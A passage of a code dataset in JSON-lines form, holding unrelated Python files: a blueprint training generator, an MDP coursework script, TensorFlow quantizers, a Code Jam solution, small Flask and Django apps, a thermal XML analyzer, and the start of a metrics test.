-> Generator[Blueprint, None, None]:\n for k, bpDict in iter_stored_blueprints(self.seed):\n try:\n wrapper = BlueprintWrapper(**bpDict)\n except KeyError as e:\n if self.verbose:\n print(e)\n continue\n except UnknownEntityException as e:\n if self.verbose:\n print(f\"Unknown entity in {k}: {e}\")\n continue\n except Exception:\n if self.verbose:\n print(f\"Error processing blueprint with key {k}.\")\n continue\n\n for bp in wrapper.iter_items():\n yield bp\n\n def iter_training_set(self) -> Generator[Tuple[np.array, np.array], None, None]:\n for bp in self.iter_individual_blueprints():\n omit_bp = copy.deepcopy(bp)\n omit_bp.entities = omit_bp.entities[int(self.train_omission_portion * len(bp.entities)):]\n\n grid = Grid(bp)\n self._validate_entity_array(grid.grid)\n\n omit_grid = Grid(omit_bp, grid.width, grid.height, grid.x_offset, grid.y_offset)\n\n one_hot = self.one_hot_encode_grid(grid.grid)\n omit_one_hot = self.one_hot_encode_grid(omit_grid.grid)\n for x, y in zip(self.iter_grid_chunks(omit_one_hot), self.iter_grid_chunks(one_hot)):\n s = np.sum(y)\n if s - s * self.train_omission_portion < self.minimum_entity_count:\n continue\n\n yield x, y\n\n\ndef main():\n import time\n\n gen = TrainGenerator(seed=None, verbose=True)\n\n t0 = time.time()\n for i, (x, y) in enumerate(gen.iter_training_set()):\n if i > 1000:\n break\n # print(gen.one_hot_decode_grid(x))\n t1 = time.time()\n print(t1 - t0)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"TrainGenerator.py","file_name":"TrainGenerator.py","file_ext":"py","file_size_in_byte":6425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"93017403","text":"\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n\ntheta_set = [20, 40, 60, 80]\n\ndef P_c1_d(d, theta):\n\n\t# calculate P(catch|d) = 1 − [ 1 / (1 + exp(− d− θ /15 )) ]\n\tdenom = 1 + math.exp( -1 * ( (d - theta)/15 ) )\n\tp_catch = 1.0 - (1 / denom)\n\treturn p_catch\n\ndef Up(s, action, level):\n\n\tif level >= 4:\n\t\treturn 0.0\n\n\tutilityOutput = 0.0\n\n\ttheta = s\n\tdistance = action\n\tRsa = action * P_c1_d(distance, theta)\n\n\tsp_summation = 0.0\n\tfor i in range(len(theta_set)):\n\t\t\n\t\tsp = theta_set[i]\n\n\t\tT = 1.0 if sp == s else 0.0\n\n\t\to_summation = 0.0\n\n\t\tfor o in range(2):\n\t\n\t\t\tP = P_c1_d(action, sp)\n\n\t\t\tif o == 1:\n\t\t\t\t# successful catch\n\t\t\t\tU_sub = Up(sp, action + 10, level + 1)\n\t\t\t\to_summation += P * U_sub\n\n\t\t\telse:\n\t\t\t\t# no catch\n\t\t\t\tU_sub = Up(sp, action - 10, level + 1)\n\t\t\t\to_summation += (1 - P) * U_sub\n\n\t\t\t\n\t\tsp_summation += T * o_summation\n\t\n\treturn Rsa + sp_summation\n\t\n\t\ndef get_alpha_vec():\n\n\tpossible_states_b = [20, 40, 60, 80]\n\talpha_vec = [0.0] * 4\n\troot_action = 50\n\n\tfor i in range(len(alpha_vec)):\n\t\t\n\t\ts = possible_states_b[i]\n\t\t\n\t\talpha_vec[i] = Up(s, root_action, 0)\n\n\treturn alpha_vec\n\n\nalpha_vec = get_alpha_vec() \nprint(\"alpha_vec: \", alpha_vec)\n","sub_path":"coursework/courseworkCode/cs238-decisionMakingUnderUncertainty/problems/q7.py","file_name":"q7.py","file_ext":"py","file_size_in_byte":1187,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"409452551","text":"import tensorflow as tf\nfrom ._nnimc_tf import TfQuantizer\nfrom ._nnimc_tf import _tf_default_get_configure, _tf_default_load_configure_file\n\nimport logging\nlogger = logging.getLogger('tensorflow quantizer')\n\nclass 
NaiveQuantizer(TfQuantizer):\n \"\"\"\n quantize weight to 8 bits\n \"\"\"\n def __init__(self):\n super().__init__()\n self.layer_scale = {}\n\n def quantize_weight(self, layer_info, weight):\n new_scale = tf.reduce_max(tf.abs(weight)) / 127\n scale = tf.maximum(self.layer_scale.get(layer_info.name, tf.constant(0.0)), new_scale)\n self.layer_scale[layer_info.name] = scale\n orig_type = weight.dtype\n return tf.cast(tf.cast(weight / scale, tf.int8), orig_type) * scale\n\nclass QATquantizer(TfQuantizer):\n \"\"\"\n Quantizer using quantization-aware training (QAT), as described in:\n Jacob et al., Quantization and Training of Neural Networks for Efficient Integer-Arithmetic-Only Inference\n http://openaccess.thecvf.com/content_cvpr_2018/papers/Jacob_Quantization_and_Training_CVPR_2018_paper.pdf\n \"\"\"\n def __init__(self, configure_list):\n \"\"\"\n Configure Args:\n q_bits\n \"\"\"\n super().__init__()\n self.configure_list = []\n if isinstance(configure_list, list):\n for configure in configure_list:\n self.configure_list.append(configure)\n else:\n raise ValueError('please init with configure list')\n \n \n def get_qbits(self, configure):\n if not isinstance(configure, dict):\n logger.warning('WARNING: you should input a dict to get_qbits, set DEFAULT { }')\n configure = {}\n qbits = configure.get('q_bits', 32)\n if qbits == 0:\n logger.warning('WARNING: you can not set q_bits ZERO!')\n qbits = 32\n return qbits\n\n def quantize_weight(self, layer_info, weight):\n q_bits = self.get_qbits(_tf_default_get_configure(self.configure_list, layer_info))\n\n a = tf.stop_gradient(tf.reduce_min(weight))\n b = tf.stop_gradient(tf.reduce_max(weight))\n n = tf.cast(2 ** q_bits, tf.float32)\n scale = (b-a)/(n-1) # uniform quantization step over the [a, b] range\n \n # use gradient_override_map to change round to identity for gradient\n with tf.get_default_graph().gradient_override_map({'Round': 'Identity'}):\n qw = tf.round((weight-a)/scale)*scale +a\n \n return qw\n\nclass DoReFaQuantizer(TfQuantizer):\n \"\"\"\n Quantizer using the DoReFa scheme, as defined in:\n Zhou et al., DoReFa-Net: Training Low Bitwidth Convolutional Neural Networks with Low Bitwidth Gradients\n (https://arxiv.org/abs/1606.06160)\n \"\"\"\n def __init__(self, configure_list):\n \"\"\"\n Configure Args:\n q_bits\n \"\"\"\n super().__init__()\n self.configure_list = []\n if isinstance(configure_list, list):\n for configure in configure_list:\n self.configure_list.append(configure)\n else:\n raise ValueError('please init with configure list')\n\n \n def get_qbits(self, configure):\n if not isinstance(configure, dict):\n logger.warning('WARNING: you should input a dict to get_qbits, set DEFAULT { }')\n configure = {}\n qbits = configure.get('q_bits', 32)\n if qbits == 0:\n logger.warning('WARNING: you can not set q_bits ZERO!')\n qbits = 32\n return qbits\n\n def quantize_weight(self, layer_info, weight):\n q_bits = self.get_qbits(_tf_default_get_configure(self.configure_list, layer_info))\n a = tf.math.tanh(weight)\n b = a/(2*tf.reduce_max(tf.abs(weight))) + 0.5\n\n scale = pow(2, q_bits-1)\n # use gradient_override_map to change round to identity for gradient\n with tf.get_default_graph().gradient_override_map({'Round': 'Identity'}):\n qw = tf.round(b*scale)/scale\n r_qw = 2*qw - 1\n return r_qw\n","sub_path":"src/sdk/pynni/nni/compressors/tf_compressor/quantizer.py","file_name":"quantizer.py","file_ext":"py","file_size_in_byte":3950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"200342881","text":"import math\r\ndef binary(x):\r\n binaryx = \"\"\r\n if 
x==0:\r\n return \"0\"\r\n w=x\r\n y = (math.log(x, 2) // 1) + 1\r\n for p in range (int(y), h-1):\r\n binaryx = binaryx + \"0\"\r\n while y!=0:\r\n if w < 2**(y-1):\r\n binaryx = binaryx + \"0\"\r\n else:\r\n binaryx = binaryx + \"1\"\r\n w = w - (2**(y-1))\r\n y = y-1\r\n return binaryx\r\ndef split(c):\r\n data = list()\r\n finish = False\r\n d = -1\r\n e = 0\r\n while finish == False:\r\n d = d+1\r\n e = e+1\r\n if c[d] == \" \":\r\n data.append(c[d-e+1:d])\r\n c = c[:d] + \",\" + c[d:]\r\n d = d+1\r\n e = 0\r\n if d == len(c)-1:\r\n finish = True\r\n data.append(c[len(c)-e:])\r\n return data\r\nwith open(\"B-large2016R1C.in\") as z:\r\n a = z.readline()\r\n for b in range (0, int(a)):\r\n v = z.readline()\r\n f = split(v)\r\n for g in range (0,2):\r\n f[g] = int(f[g])\r\n special = False\r\n h = f[0]\r\n i = f[1]\r\n if i>2**(h-2):\r\n print(\"Case #\" + str(b+1) + \": \" + \"IMPOSSIBLE\")\r\n continue\r\n elif i == 2**(h-2):\r\n special = True\r\n print(\"Case #\" + str(b+1) + \": \" + \"POSSIBLE\")\r\n i = i-1\r\n else:\r\n print(\"Case #\" + str(b+1) + \": \" + \"POSSIBLE\")\r\n j = binary(i)\r\n j = list(j)\r\n if special == True:\r\n j.append(\"1\")\r\n else:\r\n j.append(\"0\")\r\n for k in range (0,h):\r\n answer = ''\r\n for l in range (0,k+1):\r\n answer = answer + \"0\"\r\n for m in range (k+1,h-1):\r\n answer = answer + \"1\"\r\n if k == h-1:\r\n answer = answer\r\n else:\r\n answer = answer + j[h-1-k]\r\n print(answer)\r\n\r\n\r\n \r\n","sub_path":"solutions_5744014401732608_1/Python/thefourseasons/B-small2016R1C.py","file_name":"B-small2016R1C.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"581744674","text":"from u2b import u2bsrt\nfrom flask import Flask, request, render_template, jsonify\napp = Flask(__name__)\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n \n@app.route('/langs', methods=['GET', 'POST'])\ndef langs():\n if request.method == 'GET':\n return \"list langs\"\n elif request.method == 'POST':\n video_url = request.form.get('video-url', '')\n langs = u2bsrt(video_url).get_langs()\n return jsonify(langs)\n\nif __name__ == \"__main__\":\n app.run(host='0.0.0.0', port=8080, debug=True)","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"474370311","text":"from datetime import datetime, timedelta\nfrom threading import Timer\n\nx=datetime.today()\ny = x.replace(day=x.day, hour=8, minute=0, second=0, microsecond=0) + timedelta(days=1)\ndelta_t=y-x\n\nsecs=delta_t.total_seconds()\n\ndef main():\n\texec(open(\"getData.py\").read())\n\texec(open(\"postImg.py\").read())\n\n\nt = Timer(secs, main)\nt.start()","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":331,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"230100222","text":"\"\"\"kh_site URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n https://docs.djangoproject.com/en/1.10/topics/http/urls/\nExamples:\nFunction views\n 1. Add an import: from my_app import views\n 2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')\nClass-based views\n 1. Add an import: from other_app.views import Home\n 2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')\nIncluding another URLconf\n 1. 
Import the include() function: from django.conf.urls import url, include\n 2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))\n\"\"\"\nfrom django.conf.urls import include, url\nfrom django.contrib import admin\nfrom django.conf import settings\nfrom django.conf.urls.static import static\n\nurlpatterns = [\n url(r'^', include('home.urls')),\n url(r'^manage/', admin.site.urls),\n url(r'^blog/', include('blog.urls')),\n url(r'^redactor/', include('redactor.urls')),\n url(r'^services/speaking/', include('speaking.urls')),\n url(r'^services/healers/', include('healers.urls')),\n url(r'^services/healing-circle/', include('group_coaching.urls')),\n url(r'^services/resources/', include('resources.urls')),\n url(r'^accounts/', include('registration.backends.simple.urls')),\n]\n\nhandler404 = 'home.views.handler404'\nhandler500 = 'home.views.handler500'\n\nadmin.site.site_title = \"Kyeisha Hodge admin\"\nadmin.site.site_header = \"Kyeisha Hodge - Administration\"\n\nif settings.DEBUG:\n urlpatterns += static(\n settings.MEDIA_URL, document_root=settings.MEDIA_ROOT\n )\n urlpatterns += static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)\n","sub_path":"kh_site/kh_site/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"294982700","text":"# @copyright Copyright 2019 United States Government as represented by the Administrator of the\n# National Aeronautics and Space Administration. All Rights Reserved.\n#\n####################################################################################################\n## created: Nov 2013\n##\n## @author: Joe Valerioti (L-3 STRATIS) joseph.valerioti@nasa.gov\n####################################################################################################\n## Include all necessary classes.\nfrom XmlEntryAnalyzing import XmlEntryAnalyzer\nfrom XmlParsing import XmlParser, TagNotFound\nfrom ThermSupport import ThermError\n\n#===================================================================================================\n# SourceEntryAnalyzer\n#===================================================================================================\n## @brief:\n## This class contains members used in storing and analyzing xml-data from an entry in an Thermal\n## xml file. The class is passed an xml element from construction, and from\n## this is gathered data about the link. Its functions are inherited from the parent class. They\n## are called externally by IndivNetworkBuilder in validating the user-defined xml-data. 
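## For orientation, an entry element of the kind this class consumes might
## look like the following (the <node> tag and the optional data fields are
## the ones read below; the surrounding tag name and values are illustrative):
##   <source>
##     <node>fuselageNode01</node>
##     <scalar>0.5</scalar>
##   </source>
## loadData() collects the text of every <node> child into mNodeList and reads
## the optional scalar/area/absorp/initFlux entries via getUnrequiredData().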
\nclass SourceEntryAnalyzer(XmlEntryAnalyzer):\n ## @brief:\n ## Default constructs the object with default, uninitialized members.\n def __init__(self):\n uninitialized = \"[not initialized]\"\n \n ## Base class constructor.\n XmlEntryAnalyzer.__init__(self)\n \n ## The initial temperature of the node.\n self.mLinkType = uninitialized\n\n ## A list of nodes to which this source is linked.\n self.mNodeList = [] \n \n ## Other pieces of data that a source may have \n self.mScalar = None\n self.mArea = None\n self.mAbsorp = None\n self.mInitFlux = None\n #=============================================================================================== \n ## @brief:\n ## Initializes the class using three arguments.\n ## @param[in]: linkType type of link being read \n ## @param[in]: entry ElementTree xml-element of data from Thermal, Htr, or Panel registry\n ## @param[in]: symMap dictionary with the definitions of symbols used in the registries\n def initialize(self, linkType, entry, symMap={}):\n ## The initial temperature of the node.\n self.mLinkType = linkType.lower()\n\n if self.mLinkType != \"heater\" and \\\n self.mLinkType != \"source\" and \\\n self.mLinkType != \"panel\":\n raise ThermError(\"Link type does not exist (%s).\" % self.mLinkType)\n \n ## Base class initializer\n XmlEntryAnalyzer.initialize(self, entry, symMap)\n \n ## Initialize properties specific to ThermalSource entries.\n self.loadData()\n \n ## Raise the flag only if we've made it this far.\n self.mIsInitialized = True \n #----------------------------------------------------------------------------------------------- \n ## Reads and sets data contained in XML.\n def loadData(self):\n ## Get node elements.\n nodeElements = self.mParser.getElements(self.mEntry, \"node\", True)\n \n ## Append nodes to list.\n for nodeElement in nodeElements:\n self.mNodeList.append(self.mParser.getText(nodeElement))\n \n ## The purpose of the following code is to make sure that if a piece of data is provided in\n ## the xml, it is valid. 
As in, not a string, an invalid expression, or negative.\n self.mScalar = self.getUnrequiredData(self.mEntry, \"scalar\")\n self.mArea = self.getUnrequiredData(self.mEntry, \"area\")\n self.mAbsorp = self.getUnrequiredData(self.mEntry, \"absorp\")\n self.mInitFlux = self.getUnrequiredData(self.mEntry, \"initFlux\")\n","sub_path":"gunns-ts-models/bin/ThermAspectGenerate/SourceEntryAnalyzing.py","file_name":"SourceEntryAnalyzing.py","file_ext":"py","file_size_in_byte":3901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"250907777","text":"# Author: DINDIN Meryll\n# Date: 09 July 2019\n# Project: AsTeR\n\ntry: from service_SQL.schema import *\nexcept: from schema import *\n\ntry: from service_SQL.graphs import *\nexcept: from graphs import *\n\napp = Flask('SQL')\napp.config['SQLALCHEMY_DATABASE_URI'] = format_url('sqlite')\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = True\n# Change application context to avoid conflict\nwith app.app_context(): dtb.init_app(app)\n\n# API key filter\ndef filter_key(function):\n\n @wraps(function)\n def decorated_function(*args, **kwargs):\n # Load API keys\n with open('configs/api_keys.yaml') as raw: keys = yaml.safe_load(raw)['keys']\n # Check security\n if request.headers.get('apikey') and request.headers.get('apikey') in keys:\n return function(*args, **kwargs)\n else: \n arg = {'status': 200, 'mimetype': 'application/json'}\n msg = {'success': False, 'reason': 'Wrong api key provided'}\n return Response(response=json.dumps(msg), **arg)\n\n return decorated_function\n\n# Obtain the transcript from the STT service\ndef get_transcript(audio_path, key):\n\n fle = {'audio_file': open(audio_path, 'rb')}\n url = '/'.join(['http://servicesql-comedic-wallaby.mybluemix.net', 'run'])\n req = requests.post(url, headers={'apikey': key}, files=fle, params={'api_type': 'IBM'})\n\n try: return json.loads(req.content)\n except: return None\n\n# Determines and updates the paths\ngrp = Trajectory('graphs/sanfrancisco.jb')\n\nif __name__ == '__main__':\n\n @app.route('/connect', methods=['POST'])\n @filter_key\n def connect():\n\n boo, req = False, parse_arguments(request)\n arg = {'status': 200, 'mimetype': 'application/json'}\n usr = User.query.filter_by(username=req['username']).first()\n\n if usr is None:\n boo = False\n err = 'Username is not registered' \n # passlib's verify() takes the candidate secret first, then the stored hash\n elif not sha256_crypt.verify(req['password'], usr.password):\n boo = False\n err = 'Password was incorrect'\n else:\n boo = True\n err = 'None'\n\n msg = {'username': req['username'], 'success': boo, 'reason': err}\n if boo: msg.update({'first_name': usr.firstname, 'last_name': usr.lastname})\n return Response(response=json.dumps(msg), **arg)\n\n @app.route('/register', methods=['POST'])\n @filter_key\n def register():\n\n req = parse_arguments(request)\n arg = {'status': 200, 'mimetype': 'application/json'}\n \n usr = User.query.filter_by(username=req['username']).first()\n if not usr is None:\n msg = {'username': req['username'], 'success': False, 'reason': 'Username is already used'}\n return Response(response=json.dumps(msg), **arg)\n\n eml = User.query.filter_by(email=req['email']).first()\n if not eml is None:\n msg = {'username': req['username'], 'success': False, 'reason': 'Email address is already used'}\n return Response(response=json.dumps(msg), **arg)\n\n dtb.session.add(User(**req))\n dtb.session.commit()\n msg = {'username': req['username'], 'success': True, 'reason': 'None'}\n return Response(response=json.dumps(msg), **arg)\n\n 
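# A client call against these key-guarded routes might look like this (host,
# key and credentials are placeholders, not real values):
#   import requests
#   requests.post('http://localhost:8000/connect',
#                 headers={'apikey': 'YOUR_KEY'},
#                 data={'username': 'jdoe', 'password': 'secret'})
# filter_key only lets the request through when the apikey header matches one
# of the keys loaded from configs/api_keys.yaml.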
@app.route('/get_call', methods=['POST'])\n @filter_key\n def get_call():\n\n res, arg = dict(), parse_arguments(request)\n lst = Call.query.filter(Call.time <= arg['timing'])\n\n for call in lst:\n req = call.__dict__.copy()\n for key in ['call_id', '_sa_instance_state']: del req[key]\n res[call.call_id] = req\n\n arg = {'status': 200, 'mimetype': 'application/json'}\n return Response(response=json.dumps(res), **arg)\n\n @app.route('/get_unit', methods=['POST'])\n @filter_key\n def get_unit():\n\n def update_units():\n\n lst = Unit.query.all()\n for unit in [unit for unit in lst if unit.target != 'none']:\n pos = grp.closest_key(unit.latitude, unit.longitude)\n obj = grp.closest_key(*[float(x) for x in unit.target.split(':')])\n # Update object\n setattr(unit, 'path', '|'.join(grp.shortest_path(pos, obj)))\n dtb.session.add(unit)\n dtb.session.commit()\n # Memory efficiency\n del pos, obj\n\n update_units()\n res, lst = dict(), Unit.query.all()\n\n for unit in lst:\n req = unit.__dict__.copy()\n for key in ['unit_id', '_sa_instance_state']: del req[key]\n res[unit.unit_id] = req\n\n arg = {'status': 200, 'mimetype': 'application/json'}\n return Response(response=json.dumps(res), **arg)\n\n @app.route('/add_unit', methods=['POST'])\n @filter_key\n def add_unit():\n\n req = parse_arguments(request)\n arg = {'status': 200, 'mimetype': 'application/json'}\n\n unt = Unit.query.filter_by(unit_id=req['unit_id']).first()\n if not unt is None: \n msg = {'success': False, 'reason': 'Unit ID is already used'}\n return Response(response=json.dumps(msg), **arg)\n\n dtb.session.add(Unit(**req))\n dtb.session.commit()\n msg = {'unit_id': req['unit_id'], 'success': True, 'reason': 'None'}\n return Response(response=json.dumps(msg), **arg)\n\n app.run(host='0.0.0.0', port=int(os.getenv('PORT', 8000)), threaded=True)\n # app.run(host='127.0.0.1', port=8080, threaded=True)","sub_path":"service_SQL/endpoint.py","file_name":"endpoint.py","file_ext":"py","file_size_in_byte":5460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"445582539","text":"import numpy as np\nfrom scipy import interpolate, sparse\nfrom numpy.linalg import norm\nfrom scipy.linalg import block_diag\nfrom cvxopt import matrix, solvers\nfrom itertools import combinations\nimport cvxpy as cp\nfrom LCADMM.node import ADMM_var\nfrom LCADMM.constants import *\nimport pdb\n\nclass ADMM_problem():\n def __init__(self,beta = ADMM_BETA):\n self.N = 0\n self.vars = []\n self.ndx = {}\n self.vardim = 0\n self.x_sol = None\n self.beta = beta\n def add_agent(self,agent):\n self.N+=1\n self.vars.append(agent)\n self.ndx[agent]=self.vardim\n self.vardim+=agent.dim\n def Add_ineq_cons(self,vars,As,b):\n if isinstance(vars,ADMM_var):\n if vars not in self.vars:\n self.add_agent(vars)\n vars.Add_ineq_cons(None,As,None,b)\n elif isinstance(vars,list):\n M = len(vars)\n # split the shared constraint evenly across the M agents\n As = [Ai/M for Ai in As]\n b = b/M\n # pdb.set_trace()\n for var in vars:\n if var not in self.vars:\n self.add_agent(var)\n if M==1:\n vars[0].Add_ineq_cons(None,As[0],None,b)\n elif M==2:\n vars[0].Add_ineq_cons(vars[1],As[0],As[1],b)\n vars[1].Add_ineq_cons(vars[0],As[1],As[0],b)\n else:\n for i in range(0,len(vars)):\n subvar = vars[0:i]+vars[i+1:]\n subAs = As[0:i]+As[i+1:]\n vars[i].Add_ineq_cons(subvar,As[i],subAs,b)\n\n def solve(self,maxiter = 1e6, tol = 1e-4):\n iter = 0\n err = 1.\n for var in self.vars:\n var.solve_local_QP(self.beta)\n # pdb.set_trace()\n while iter<maxiter and err>tol:\n err = 0.\n iter +=1\n # 
print(self.vars[0].y1[self.vars[0].NB[0]])\n # print(self.vars[0].x_sol[0:2])\n # print(self.vars[0].f[0:2])\n for var in self.vars:\n\n if ADMM_ADAPTIVE:\n delta_x = var.x_sol[0:var.total_dim]-var.x_sol_old\n hh = 0\n hh +=(var.p+ADMM_RHO*var.N_nb)*norm(delta_x)**2\n du = hh\n for var1 in var.NB:\n\n dx = (var.x_sol[var.ndx[var1]:var.ndx[var1]+var1.dim]-var1.x_sol[var1.ndx[var1]:var1.ndx[var1]+var1.dim]).flatten()\n if ADMM_ADAPTIVE:\n hh+=norm(dx)**2*(2-ADMM_GAMMA)*ADMM_RHO+2*ADMM_RHO*dx.dot(delta_x[var.ndx[var1]:var.ndx[var1]+var1.dim])\n du +=ADMM_RHO*ADMM_GAMMA*norm(dx)**2\n var.y1[var1]+=ADMM_GAMMA*ADMM_RHO*dx/var1.x_norm\n var1.y2[var] = var.y1[var1]\n var1.z[var] = var.x_sol[var.ndx[var]:var.ndx[var]+var.dim].flatten()\n\n err = max(err,norm(dx/var1.x_norm))\n # if norm(dx/var1.x_norm)>1.5:\n # print(var.y1[var1])\n # if iter>60 and norm(dx/var1.x_norm)>1.9:\n # pdb.set_trace()\n if ADMM_ADAPTIVE:\n if hh<0.5*du:\n var.p+=ADMM_q\n if err<=tol:\n break\n print(err)\n for var in self.vars:\n var.solve_local_QP(self.beta)\n # pdb.set_trace()\n self.x_sol = np.zeros(self.vardim)\n for var in self.vars:\n self.x_sol[self.ndx[var]:self.ndx[var]+var.dim]= var.x_sol[var.ndx[var]:var.ndx[var]+var.dim].flatten()\n return self.x_sol\n def solve_centralized(self):\n ndx = {}\n dim = 0\n for var in self.vars:\n ndx[var] = dim\n dim+=var.dim\n Ac = np.empty([0,dim])\n bc = np.empty(0)\n for var in self.vars:\n Aci = np.zeros([var.Ac.shape[0],dim])\n bci = var.bc\n Aci[:,ndx[var]:ndx[var]+var.dim] = var.Ac\n Ac = np.vstack((Ac,Aci))\n bc = np.append(bc,bci)\n Ain = np.empty([0,dim])\n bin = np.empty(0)\n pairs = combinations(self.vars,2)\n for pair in pairs:\n var0 = pair[0]\n var1 = pair[1]\n if var1 in var0.NB:\n idx = np.where((var0.A[:,var0.ndx[var1]:var0.ndx[var1]+var1.dim]!=0).any(axis=1))[0]\n Anew = np.zeros([idx.shape[0],dim])\n Anew[:,ndx[var0]:ndx[var0]+var0.dim] = var0.A[idx,var0.ndx[var0]:var0.ndx[var0]+var0.dim]\n Anew[:,ndx[var1]:ndx[var1]+var1.dim] = var0.A[idx,var0.ndx[var1]:var0.ndx[var1]+var1.dim]\n bnew = var0.b[idx]\n Ain = np.vstack((Ain,Anew))\n bin = np.append(bin,bnew)\n\n ns = Ain.shape[0]\n Ac = np.hstack((Ac,np.zeros([Ac.shape[0],ns])))\n Ain = np.hstack((Ain,-np.eye(ns)))\n Ain1 = np.hstack((np.zeros([ns,dim]),-np.eye(ns)))\n Ain = np.vstack((Ain,Ain1))\n bin = np.append(bin,np.zeros(ns))\n\n Q = np.zeros([dim+ns,dim+ns])\n for var in self.vars:\n Q[ndx[var]:ndx[var]+var.dim,ndx[var]:ndx[var]+var.dim]=np.diag(1/var.x_norm**2)\n f = np.zeros(dim+ns)\n for var in self.vars:\n f[ndx[var]:ndx[var]+var.dim]=-var.x_des/(var.x_norm**2)\n f[dim:dim+ns] = 2*self.beta\n\n G = np.vstack((Ac,Ain))\n h = np.append(bc,bin)\n sol=solvers.qp(matrix(Q), matrix(f), matrix(G), matrix(h))\n print(sol['primal objective'])\n x_sol = np.array(sol['x']).flatten()[0:dim]\n return x_sol\n\n def solve_constrained_centralized(self,exp_relax = False):\n if not exp_relax:\n ndx = {}\n con_ndx = {}\n dim = 0\n Q = np.empty([0,0])\n f = np.empty(0)\n G = np.empty([0,0])\n h = np.empty(0)\n for var in self.vars:\n\n if not var.opt_ready:\n var.generate_local_QP(self.beta)\n ndx[var] = dim\n dim += var.vardim\n var.Q = np.zeros([var.vardim,var.vardim])\n var.f = np.zeros(var.vardim)\n\n var.Q[var.ndx[var]:var.ndx[var]+var.dim,var.ndx[var]:var.ndx[var]+var.dim]=np.diag(1/var.x_norm**2)\n\n\n var.f[var.ndx[var]:var.ndx[var]+var.dim] += -var.x_des/(var.x_norm**2)\n var.f[var.ndx['s']:var.ndx['s']+var.ns] = self.beta*np.ones(var.ns)\n\n Q = block_diag(Q,var.Q)\n f = np.append(f,var.f)\n G = 
block_diag(G,var.G)\n h = np.append(h,var.h)\n\n vardim = dim\n # A = np.empty([0,vardim])\n # b = np.empty(0)\n condim = G.shape[0]\n\n for var in self.vars:\n for var1 in var.NB:\n con_ndx[(var, var1)] = condim\n Anew = np.zeros([var1.dim*2,vardim])\n Anew[0:var1.dim,ndx[var]+var.ndx[var1]:ndx[var]+var.ndx[var1]+var1.dim] = np.eye(var1.dim)\n Anew[0:var1.dim,ndx[var1]+var1.ndx[var1]:ndx[var1]+var1.ndx[var1]+var1.dim] = -np.eye(var1.dim)\n\n Anew[var1.dim:2*var1.dim,ndx[var]+var.ndx[var1]:ndx[var]+var.ndx[var1]+var1.dim] = -np.eye(var1.dim)\n Anew[var1.dim:2*var1.dim,ndx[var1]+var1.ndx[var1]:ndx[var1]+var1.ndx[var1]+var1.dim] = np.eye(var1.dim)\n\n G = np.vstack((G,Anew))\n h = np.append(h,np.zeros(2*var1.dim))\n\n condim = G.shape[0]\n sol=solvers.qp(matrix(Q), matrix(f), matrix(G), matrix(h))\n print(sol['primal objective'])\n sol_x = np.array(sol['x']).flatten()\n sol_z = np.array(sol['z']).flatten()\n x_sol = np.empty(0)\n y_sol = {}\n for var in self.vars:\n x_sol = np.append(x_sol,sol_x[ndx[var]+var.ndx[var]:ndx[var]+var.ndx[var]+var.dim])\n for var1 in var.NB:\n y1 = sol_z[con_ndx[(var,var1)]:con_ndx[(var,var1)]+var1.dim]\n y2 = sol_z[con_ndx[(var,var1)]+var1.dim:con_ndx[(var,var1)]+2*var1.dim]\n y_sol[(var,var1)] = y1-y2\n else:\n\n cost = cp.sum(0)\n cons = []\n xs = {}\n\n for var in self.vars:\n\n if not var.opt_ready:\n var.generate_local_QP(self.beta)\n xs[var] = cp.Variable(var.total_dim)\n cost += 0.5*cp.sum_squares(xs[var][var.ndx[var]:var.ndx[var]+var.dim]-var.x_des)\n for i in range(0,var.ns):\n Aib = var.A[i,:]@ xs[var]-var.b[i]\n cost += self.beta*cp.log_sum_exp(cp.vstack([ADMM_ETA*Aib,0]))/ADMM_ETA\n cons += [var.Ac@xs[var][var.ndx[var]:var.ndx[var]+var.dim]<=var.bc]\n\n con_ndx = {}\n for var in self.vars:\n for var1 in var.NB:\n con_ndx[(var,var1)] = len(cons)\n cons += [xs[var][var.ndx[var1]:var.ndx[var1]+var1.dim]==xs[var1][var1.ndx[var1]:var1.ndx[var1]+var1.dim]]\n\n prob = cp.Problem(cp.Minimize(cost),cons)\n prob.solve()\n\n\n x_sol = np.empty(0)\n y_sol = {}\n for var in self.vars:\n x_sol = np.append(x_sol,xs[var][var.ndx[var]:var.ndx[var]+var.dim].value)\n for var1 in var.NB:\n y_sol[(var,var1)] = cons[con_ndx[(var,var1)]].dual_value\n\n return x_sol,y_sol\n","sub_path":"LCADMM/solver.py","file_name":"solver.py","file_ext":"py","file_size_in_byte":9459,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"83"} +{"seq_id":"290651475","text":"import torch\nimport unittest\n\nfrom snow.metrics import F1, FBeta, Perplexity\n\n\nclass TestMetrics(unittest.TestCase):\n def test_ppl(self):\n inputs = torch.tensor(\n [[1.0, 0, 0, 0], [0, 1.0, 0, 0], [0, 0, 1.0, 0], [0, 0, 0, 1.0]]\n )\n targets = torch.tensor([0, 1, 